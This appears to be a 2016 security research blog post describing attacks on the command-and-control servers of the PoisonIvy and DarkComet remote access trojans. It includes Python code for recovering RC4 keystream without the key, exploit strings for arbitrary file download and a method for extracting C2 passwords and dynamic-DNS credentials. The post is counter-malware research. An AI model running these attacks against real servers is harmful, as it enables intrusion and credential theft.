With this information we can build a reliable exploit giving us arbitrary code execution. The only thing still standing in our way is the fact that it’s effectively a ‘post-auth’ vuln, as we need to know the shared secret key to encrypt the part of the crafted buffer which will be decrypted. Obtaining such a key is easy enough once an infected sample has been discovered, but a ‘pre-auth’ exploit is always preferable over a ‘post-auth’ one and being able to wield it against every PIVY C2 server makes it a bit more interesting.

From post-auth to pre-auth: breaking the PIVY 2.1.x crypto

As noted by megasecurity PIVY 2.1.4 and prior make use of the RC4 stream cipher. Now, RC4 should be considered thoroughly broken but it was reasonable to use it back when PIVY was developed. Besides, the problem here isn’t so much the usage of RC4 as the security design of the protocol. As can be seen in the image below, the keystreams between sender and receiver run synchronously (probably because separate RC4 instances are running for sending and receiving within a given process to ensure automatic synchronization):

This means that if we receive a bunch of ciphertext from the C2 server for which we know the plaintext, we can derive the corresponding keystream through a known plaintext attack (which, for stream ciphers, is just a XOR between known plaintext and ciphertext). We can then reuse this derived keystream to encrypt the required parts of our exploit buffer without having to know any secret key at all. Once again a design mistake in the cryptographic protocol makes an exploit against PIVY that much more powerful. It goes to show that secure cryptographic protocol design is no piece of cake.
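A minimal sketch of this keystream recovery, assuming (as described above) that the stream we decrypt and the stream the server uses to decrypt our data start at the same keystream position. The ‘secret’ keystream here is a deterministic stand-in rather than real RC4 output, and RecoveredKeystream is a name I made up for the example.

```python
def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class RecoveredKeystream:
    """Collects keystream from known plaintext and spends it in order."""

    def __init__(self):
        self._ks = bytearray()
        self._used = 0

    def learn(self, ciphertext: bytes, known_plaintext: bytes) -> None:
        """Append keystream recovered from the next consecutive bytes."""
        if len(ciphertext) != len(known_plaintext):
            raise ValueError("ciphertext and plaintext must align")
        self._ks += xor(ciphertext, known_plaintext)

    def encrypt(self, plaintext: bytes) -> bytes:
        """Encrypt with recovered keystream, keeping track of the position."""
        end = self._used + len(plaintext)
        if end > len(self._ks):
            raise ValueError("not enough keystream recovered")
        out = xor(plaintext, self._ks[self._used:end])
        self._used = end
        return out


# Stand-in for the keystream derived from a key we do NOT know.
secret_ks = bytes((i * 73 + 41) & 0xFF for i in range(64))

known = b"constant data we have seen before"
observed = xor(known, secret_ks)            # what we would see on the wire

rec = RecoveredKeystream()
rec.learn(observed, known)
forged = rec.encrypt(b"\x89\x01\x00\x00\x00\x00")
# The receiving side decrypts with its own keystream from position 0:
print(xor(forged, secret_ks[:6]).hex())
```

The position bookkeeping matters: since the keystream keeps running for the lifetime of the connection, every byte we encrypt has to use the keystream byte at the same offset the receiver will use to decrypt it.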

Metasploit Module

I wrote a working MSF exploit (currently only targeting the version 2.1.4 instance) for the above vulnerability:

DarkComet

DarkComet is a very popular RAT that’s been around in one form or another since 2008 and has been used by everyone from your average script kiddie or would-be cybercriminal to ‘APT-style’ attackers engaging in cyber-espionage operations, targeting oil transportation tankers or Syrian activists. It’s one of those typical off-the-shelf ‘Delphi RATs’ with a lot of built-in functionality and a pretty sleek C2 server GUI. It’s also a pretty typical RAT in that its C2 server has multiple vulnerabilities. As this 2012 paper from Matasano (now part of NCC Group) by Shawn Denbow and Jesse Hertz discusses, the C2 server of the last non-legacy DarkComet release is vulnerable to both an SQL injection vulnerability and an arbitrary file download vulnerability, the latter allowing an attacker to download any file (including the C2 configuration file and its backend SQLite database) from the RAT C2 server. The file download vulnerability resides in DarkComet’s QuickUp command, used for ad-hoc file down- and uploading as part of eg. the RAT’s file-editing capabilities as shown below:

[Image: darkcomet_quickup1]

Denbow and Hertz noticed that there is no check that the file named in both QUICKUP messages matches, that absolute paths can be specified and that the C2 server will always respond to QUICKUP commands, even if it never issued one itself. These flaws can be combined to allow an attacker to simply connect to the C2 server, complete the handshake and issue a malicious QUICKUP request to download any file, as illustrated in this image from the paper:

[Image: darkcomet_quickup2]

In the aftermath of the coverage of DarkComet’s usage by pro-Assad hackers against Syrian activists, the RAT’s author discontinued its development, releasing only a final 5.4.1 legacy version (which doesn’t include a malicious executable builder) and a cleanup tool. As such DarkComet is no longer actively developed or supported, and the versions out there are and will remain vulnerable.

The DarkComet protocol & confirming the vulnerability in other versions

Seeing as how this has been adequately covered already, I’ll only briefly discuss the DarkComet protocol. For an in-depth RE look at DarkComet’s internals I’ll refer to the extensive prior work on the subject.

In order to test this vulnerability and quickly confirm its presence or absence in other versions, what’s important for us to know is if and how DarkComet encrypts its traffic. As discussed in prior work, DarkComet encrypts its traffic using RC4 (inconsistently: file transfers seem to be sent in the clear while commands seem to be sent encrypted) and then, for some reason, converts it to hex representation and sends it over the network:

As with PIVY, DarkComet initializes the RC4 KSA without IV and always prepends a static, version-specific, prefix to any user-chosen password eg. RC4(prefix + password). The prefixes are as follows:

darkcomet 2x/3x: #KCMDDC2#-890
darkcomet 4: #KCMDDC4#-890
darkcomet 42: #KCMDDC42#-890
darkcomet 42F: #KCMDDC42F#-890
darkcomet 5: #KCMDDC5#-890
darkcomet >= 5.1: #KCMDDC51#-890

If a user doesn’t specify a password the key consists of the prefix only. With this knowledge we can test the vulnerability against other versions of the DC C2 server. Testing confirmed all versions >= 5.1 were vulnerable to the exploit described by Denbow and Hertz but it turned out versions < 5.1 don’t use the QUICKUP command identifier. In order to see what was going on under the hood of those versions without doing a bunch of RE I simply set up a MITM script between a client and server configured with their default key which would decrypt all traffic and display it for inspection. Turns out DC versions 2.0 < x < 5.1 use “UPLOAD” as a command specifier and a slightly different protocol structure for essentially the same functionality, and this command is vulnerable in the same manner. Versions 2.x and prior seem to use a different protocol which I didn’t look into any further. Either way, this confirms that the majority of DC C2 servers out there are vulnerable but, like the PIVY case, if a C2 admin has specified a password an attacker would require a corresponding malicious binary to extract the key and mount the attack, again making this more or less a ‘post-auth’ vuln.
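To make the key construction concrete, here is a minimal Python sketch of the scheme as described above: textbook RC4 keyed with prefix + password, followed by hex encoding. The version labels used as dictionary keys, the helper names, the latin-1 password encoding and the uppercase hex output are my own assumptions for illustration and are not taken from DarkComet itself.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling (KSA), then keystream XOR (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


# Prefixes as listed above; the dictionary keys are illustrative labels only.
PREFIXES = {
    "2.x/3.x": "#KCMDDC2#-890",
    "4": "#KCMDDC4#-890",
    "4.2": "#KCMDDC42#-890",
    "4.2F": "#KCMDDC42F#-890",
    "5": "#KCMDDC5#-890",
    "5.1+": "#KCMDDC51#-890",
}


def dc_key(version: str, password: str = "") -> bytes:
    """Key = static prefix + optional user password (encoding is an assumption)."""
    return (PREFIXES[version] + password).encode("latin-1")


def dc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """A fresh RC4 state per message, then hex encoding (uppercase assumed)."""
    return rc4(key, plaintext).hex().upper().encode("ascii")


def dc_decrypt(key: bytes, wire: bytes) -> bytes:
    """Inverse of dc_encrypt: hex decode, then RC4 with a fresh state."""
    return rc4(key, bytes.fromhex(wire.decode("ascii")))
```

With no password set, dc_key("5.1+") is simply the prefix itself, which is why a default-configured C2 server can be talked to without extracting anything from a sample.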

Breaking the DarkComet crypto

So DarkComet uses RC4, sure. But the choice of cryptographic primitive usually isn’t the bottleneck in security engineering; the cryptographic protocol design is, and as with PIVY it’s no different with DC. As it turns out it makes an even worse mistake than PIVY. Not only are keystreams synchronous between sender and receiver, the KSA gets reinitialized for every newly sent message. This means that effectively only the first N bytes of keystream are ever used (where N is the length of the longest plaintext sent) and that every ciphertext message is a ‘parallel ciphertext’ to every other one (across sessions and even across infected samples), similar to (but worse than) my attack on Hacking Team’s “core-packer”. So if we can get enough known plaintext, at any point during protocol communications, to match the length of our exploit string, we can use it to derive the corresponding keystream, encrypt our exploit string and exploit the vulnerability without requiring knowledge of the secret key.
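The consequence of restarting the keystream for every message can be shown in a few lines of Python. This is only a sketch of the principle: the random bytes stand in for the fixed (and to the attacker unknown) RC4 keystream prefix, and the xor helper is my own.

```python
import os


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter of the two."""
    return bytes(x ^ y for x, y in zip(a, b))


# Stand-in for the keystream prefix that every message is encrypted with.
keystream = os.urandom(32)

# The C2 server sends a message whose plaintext we already know.
known_plain = b"IDTYPE"
observed_cipher = xor(known_plain, keystream)

# Known plaintext XOR ciphertext gives us the first 6 keystream bytes...
recovered = xor(observed_cipher, known_plain)

# ...which is all we need to encrypt a 6-byte message of our own choosing.
forged = xor(b"SERVER", recovered)
```

The attacker never touches the key here: every byte of known plaintext at a given offset buys one byte of keystream at that offset, valid for all future messages.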

Let’s look at the DC protocol again using this sample by contextis to show the plaintext of a regular DC handshake:

C2: IDTYPE 
Infected: SERVER 
C2: GetSIN192.168.93.130|120826718 
Infected: infoesGuest16|192.168.93.130 / [192.168.93.130] : 1604|XP-CLIENT / Administrator|120826718|0s|Windows XP Service Pack 2 [2600] 32 bit ( C:\ )|x||US|Program Manager|b4c7d186b435fc77626a5ae904879815|275.65 MB/511.48 MB [235.84 MB Free]|English (United States) US / -- |9/22/2011 at 2:58:57 PM

So we have at least 6 bytes (IDTYPE) of known plaintext. How many do we need? If we take a look at the DarkComet C2’s config.ini we can see the following:

[SIN]
disclamer=0
help=0
MAXIMIZED=0
Ports=1604:YES;1605:YES;200:YES|3
(...)
[NOIP]
HOST=yourname.no-ip.org
USER=yourname@yourmail.com
PASS=123456789
AUTO=0
HIDE=1
[SECURITY]
PASSWD=admin

As you can see it contains both the password used to create the RC4 key as well as credentials to a no-ip dynamic DNS account which can be used to manage the C2 server’s domain name. This information is enough to recreate the actual RC4 key (and thus rerun the exploit with knowledge of the key and download any file we want) as well as potentially hijack/sinkhole the botnet, so retrieving this file seems sufficient. That means our minimal exploit string would be QUICKUP1|config.ini| (20 bytes) for versions >= 5.1 and UPLOADconfig.ini|1|1| (21 bytes) for versions < 5.1. Note that since the actual file contents are transmitted in plaintext by the DarkComet protocol, we don’t need any more keystream than what is required to cover the exploit string as we don’t have to decrypt the file content response. So let’s say we want to collect 21 bytes of keystream.
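Once config.ini has been downloaded, pulling out the interesting values is straightforward. The following Python sketch uses the standard library configparser on a trimmed copy of the excerpt above. The function name, the returned dictionary layout and the default prefix argument are assumptions of mine, and a real config.ini may contain lines that need more lenient parsing than shown here.

```python
import configparser

# Trimmed copy of the excerpt above (the elided part is left out).
SAMPLE_CONFIG = """\
[NOIP]
HOST=yourname.no-ip.org
USER=yourname@yourmail.com
PASS=123456789
[SECURITY]
PASSWD=admin
"""


def extract_secrets(config_text: str, prefix: str = "#KCMDDC51#-890") -> dict:
    """Return the reconstructed RC4 key and the no-ip credentials, if present."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(config_text)
    # An absent or empty PASSWD means the key is the bare prefix.
    password = parser.get("SECURITY", "PASSWD", fallback="")
    return {
        "rc4_key": prefix + password,
        "noip_host": parser.get("NOIP", "HOST", fallback=None),
        "noip_user": parser.get("NOIP", "USER", fallback=None),
        "noip_pass": parser.get("NOIP", "PASS", fallback=None),
    }


secrets = extract_secrets(SAMPLE_CONFIG)
```

Interpolation is switched off so that a password containing a percent sign does not trip up the parser.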

Consider this part of the handshake:

C2: IDTYPE 
Infected: SERVER 
C2: GetSIN192.168.93.130|120826718

Here we have known plaintexts IDTYPE and GetSIN (both 6 bytes) and we can use the first plaintext to derive 6 bytes of keystream, apply them to SERVER, send that command and receive the GetSIN command. The absolute (hypothetical) minimum length of that third message would be of the form GetSIN1.1.1.1|120826718 (23 bytes) so if we can make assumptions about its contents we can derive enough keystream for our attack to work. The first argument of the message is an IP address, the IP address of the infected machine to be precise. A potential problem here is that it is the client IP address as seen by the C2 server, so proxies and the like could cause some issues here. However, assuming these are not in place, we know this IP address and can thus extract an additional 8 to 16 bytes of keystream (including the pipe sign), which could potentially be enough to carry out the attack depending on the IP.
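The keystream bookkeeping above can be sketched in Python as follows. The helper names are hypothetical; the sample ciphertext is the first GetSIN ciphertext shown further down in this post, and the code assumes the IP the C2 server sees is the one we expect.

```python
EXPLOIT_NEW = b"QUICKUP1|config.ini|"   # versions >= 5.1, 20 bytes
EXPLOIT_OLD = b"UPLOADconfig.ini|1|1|"  # versions < 5.1, 21 bytes


def known_prefix(our_ip: str) -> bytes:
    """The part of the GetSIN message we can predict: command, our IP, pipe."""
    return b"GetSIN" + our_ip.encode("ascii") + b"|"


def missing_bytes(our_ip: str, exploit: bytes) -> int:
    """How many keystream bytes we still lack to cover the exploit string."""
    return max(0, len(exploit) - len(known_prefix(our_ip)))


def recover_keystream(getsin_hex: str, our_ip: str) -> bytes:
    """XOR the predictable plaintext prefix against the hex-encoded reply."""
    cipher = bytes.fromhex(getsin_hex)
    return bytes(c ^ p for c, p in zip(cipher, known_prefix(our_ip)))


# First sample GetSIN ciphertext from this post (IP 192.168.93.130).
SAMPLE_HEX = "BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40E44"
sample_keystream = recover_keystream(SAMPLE_HEX, "192.168.93.130")
```

For the sample IP the predictable prefix alone already covers 21 bytes, so no further work is needed, whereas a 7-character IP such as 1.1.1.1 leaves 7 bytes to be recovered for the UPLOAD variant.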

The second argument turns out to be a timestamp obtained via GetTickCount, so either we try to (partially) predict the target system’s uptime (eg. finding a candidate remote uptime like Nmap does and then bruteforcing around that value) or we need to do some (clever) bruteforcing. Note that DC sends its keepalive commands to the infected machine in plaintext and includes the timestamp:

KeepAlive|8248090
KeepAlive|8248097
KeepAlive|8328105

But it only starts sending these keepalive commands after the infected machine has properly announced itself to the C2 server which requires sending an encrypted infoes command (see above) which requires more keystream bytes than we have. As such I decided to settle for an (augmented) bruteforcing approach.

Seeing as how we require either 20 or 21 bytes of keystream we first determine how many bytes of keystream we already have (with a minimum of 14) and how many we still need. If we have sufficient keystream we immediately execute the attack. If we are missing some keystream bytes (at most 7) we bruteforce the first 4 of them (the keyspace is merely 10**4 here, which seems reasonable enough) by guessing the plaintext digits, deriving the corresponding keystream bytes, trying the exploit and, if it fails, moving on to the next candidate. If 4 extra bytes of keystream are still not enough we could fully bruteforce the remaining ones as well (after all 10**7 < 2**32) but due to the nature of the plaintext we can apply a smarter trick here. Seeing as how the RC4 keystream is identical for every message and we can probe the server for an unlimited number of GetSIN messages, we can observe the timestamp’s ciphertext across multiple messages. Since the misuse of RC4 effectively applies a single, static XOR key to the plaintext, identical plaintexts (at identical positions) will map to identical ciphertexts across messages and sessions, and as such we can watch the timestamp ‘tick on’ through the ciphertext, eg.:
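The bruteforce step described above could look roughly like this in Python. It is a sketch under assumptions, not the code of the actual module: try_exploit is a hypothetical callback that sends the hex-encoded payload to the C2 server and returns True when a response comes back, and the uppercase hex encoding is assumed.

```python
from itertools import product

DIGITS = b"0123456789"


def candidate_keystreams(cipher: bytes, known: bytes, digits: int = 4):
    """Yield (guess, keystream) pairs for the first unknown timestamp digits.

    cipher is the raw (hex-decoded) GetSIN ciphertext and known is the
    keystream recovered so far, which ends right before the timestamp.
    """
    start = len(known)
    unknown = cipher[start:start + digits]
    for combo in product(DIGITS, repeat=len(unknown)):
        # Guessed plaintext digit XOR ciphertext byte = candidate keystream byte.
        extra = bytes(c ^ g for c, g in zip(unknown, combo))
        yield bytes(combo), known + extra


def bruteforce(cipher: bytes, known: bytes, exploit: bytes, try_exploit, digits: int = 4):
    """Return the first keystream for which the exploit gets a response."""
    for _guess, keystream in candidate_keystreams(cipher, known, digits):
        if len(keystream) < len(exploit):
            return None  # even a correct guess would not cover the exploit
        payload = bytes(p ^ k for p, k in zip(exploit, keystream))
        if try_exploit(payload.hex().upper()):
            return keystream
    return None
```

In the worst case this makes 10**4 connection attempts, which is why a dedicated timeout for failed attempts matters in practice.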

Plain:  GetSIN192.168.93.130|120826718
Cipher: BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40E44
Plain:  GetSIN192.168.93.130|120826719
Cipher: BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40E45
Plain:  GetSIN192.168.93.130|120826720
Cipher: BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40D4C
Plain:  GetSIN192.168.93.130|120826721
Cipher: BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40D4D

As you can see in the example above, as the timestamp increments only the last byte changes until it reaches 9, after which it wraps back to 0 and, via carry, the byte to the left of it changes. Using this pattern we can deduce that if we see two bytes change between subsequent replies such a carry occurred, and we can deduce the plaintext value for the byte that wrapped around from 9 to 0. As long as we target a part of the timestamp that changes frequently enough that we don’t have to wait too long (otherwise bruteforce is a better option) but not too quickly (otherwise our observational sampling becomes too infrequent to be accurate, leading to false positives), this attack can recover the remaining plaintext (at most 3 bytes since we recover the first 4 of the timestamp with bruteforce anyway) and hence keystream faster than bruteforcing this part would.
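Applied to the sample ciphertexts above, the carry observation can be sketched in Python like this. The function name is my own, and the sketch assumes consecutive samples were taken closely enough together that the wrapped digit really reads 0 in the newer sample.

```python
# The four sample ciphertexts above share everything but the last two bytes.
COMMON = "BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C4"
C718, C719, C720, C721 = (COMMON + tail for tail in ("0E44", "0E45", "0D4C", "0D4D"))


def infer_from_carry(prev_hex: str, cur_hex: str):
    """Return (index, keystream_byte) for a digit that wrapped 9 -> 0, else None."""
    prev, cur = bytes.fromhex(prev_hex), bytes.fromhex(cur_hex)
    if len(prev) != len(cur):
        return None
    changed = [i for i, (a, b) in enumerate(zip(prev, cur)) if a != b]
    # A carry shows up as a run of two or more adjacent bytes changing at once.
    if len(changed) < 2 or changed != list(range(changed[0], changed[-1] + 1)):
        return None
    index = changed[-1]  # the rightmost changed byte is the digit that wrapped
    return index, cur[index] ^ ord("0")


result = infer_from_carry(C719, C720)
```

Here the carry between the second and third sample reveals keystream byte 0x7C at offset 29, which in turn decrypts the last byte of the second sample to the digit 9, as expected.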

Since we don’t want to miss the moment this ‘carry’ occurs nor do we want to sample too frequently I decided to store observations of the GetSIN response ciphertext in a circular buffer of size 4. During every probe attempt this buffer is traversed and successive ciphertexts are compared to see whether a ‘carry’ has occurred. In order to weed out false positives (which could occur when we miss multiple wraparounds between observations) I put an additional constraint on the ‘carry’ observation: a candidate observation has to differ from the previous observation in the crucial position, while the observation before that has to be identical to the previous observation.
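One way to sketch the buffered observation logic in Python is shown below. This reflects my reading of the constraint rather than the module's actual code: I take the ‘crucial position’ to be the byte directly to the left of the digit we want to recover, and I only compare that byte when checking whether the two older observations agree. The class and method names are hypothetical.

```python
from collections import deque


class CarryWatcher:
    """Keep the last few GetSIN ciphertexts and look for a clean carry."""

    def __init__(self, target_index: int, size: int = 4):
        self.target_index = target_index   # offset of the digit to recover
        self.buffer = deque(maxlen=size)   # circular buffer of raw ciphertexts

    def observe(self, cipher_hex: str):
        """Store a new observation and return a keystream byte if one is found."""
        self.buffer.append(bytes.fromhex(cipher_hex))
        return self.check()

    def check(self):
        obs = list(self.buffer)
        left = self.target_index - 1       # the 'crucial position' (assumed)
        for older, prev, cur in zip(obs, obs[1:], obs[2:]):
            stable_before = older[left] == prev[left]
            flipped_now = cur[left] != prev[left]
            if stable_before and flipped_now:
                # The target digit just wrapped to 0 in the newest of the three.
                return cur[self.target_index] ^ ord("0")
        return None


COMMON = "BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C4"
watcher = CarryWatcher(target_index=29)
found = [watcher.observe(COMMON + tail) for tail in ("0E44", "0E45", "0D4C", "0D4D")]
```

Using deque with maxlen gives the circular behaviour for free: once four observations are stored, every new one silently evicts the oldest.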

In practice, however, most IP addresses are long enough to already cover the required keystream (or an attacker can simply choose to attack from a host with a suitable IP) so a full bruteforce plus inference attack would rarely be required.

Metasploit Module

We can wrap all this together into an exploit that incrementally recovers more keystream until it has enough to cover the exploit string, thus allowing for exploitation without having to know the key, which is what I did in this MSF auxiliary module. The exploit can be configured to use a known key (so no cryptographic attack is required) and if a key is known it can also be configured to download any file the attacker wishes. If the attack is run without supplying a key it will automatically download the config.ini file and try to extract the password (note that if it can’t find a password the C2 server is probably running without one, so try the key prefix as key). Any downloaded file is optionally stored to MSF loot. During the bruteforce attack the exploit decides whether or not an attempt succeeded based on whether it gets a response. In order to prevent the bruteforce from becoming too slow a dedicated bruteforce timeout value can be specified.

Running the exploit against a DarkComet C2 server looks as follows:

I tested the exploit against (and confirmed the vulnerability in) the following DarkComet C2 versions:

5.3.1
5.3.0
5.2
4.2 (F)
4.2
4.0
3.3
3.2

samvartaka 03 June 2016
